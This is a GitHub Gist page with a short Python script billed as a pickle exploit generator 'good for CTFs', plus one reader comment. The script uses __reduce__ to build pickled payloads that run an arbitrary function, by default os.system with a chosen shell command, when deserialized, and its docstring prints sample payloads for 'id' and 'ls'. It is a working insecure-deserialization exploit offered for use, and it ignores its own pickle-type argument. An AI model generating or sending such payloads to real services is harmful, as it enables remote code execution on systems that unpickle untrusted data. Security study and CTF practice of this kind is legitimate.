Last active
August 1, 2022 02:08
-
-
Save 0xBADCA7/f4c700fcbb5fb8785c14 to your computer and use it in GitHub Desktop.
Python cPickle/pickle exploit generator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
''' | |
0xBADCA7 | |
Vodka goes down the throat better with pickle. | |
This script generates pickled object representation. Good for CTFs. | |
Params: [1] function, [2] parameter, [3] pickle type | |
Sample run: | |
> ./pickle_exploit_generator.py os.system id cpickle | |
Will cpickle os.system(id) | |
cposix | |
system | |
p0 | |
(S'id' | |
p1 | |
tp2 | |
Rp3 | |
. | |
> ./pickle_exploit_generator.py os.system ls pickle | |
Will pickle os.system(ls) | |
cposix | |
system | |
p0 | |
(S'ls' | |
p1 | |
tp2 | |
Rp3 | |
. | |
''' | |
import os | |
import sys | |
import pickle | |
import cPickle | |
class Exploit(object): | |
def __reduce__(self): | |
return (eval(fn), (cmd,)) | |
try: | |
pickle_type = sys.argv[3] | |
cmd = sys.argv[2] | |
fn = sys.argv[1] | |
except: | |
pickle_type = 'pickle' # or cpickle | |
cmd = 'id' | |
fn = 'os.system' | |
print("Will {} {}({})".format(pickle_type, fn, cmd)) | |
shellcode = pickle.dumps(Exploit()) | |
print(shellcode) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Where do you choose the pickle type in your code?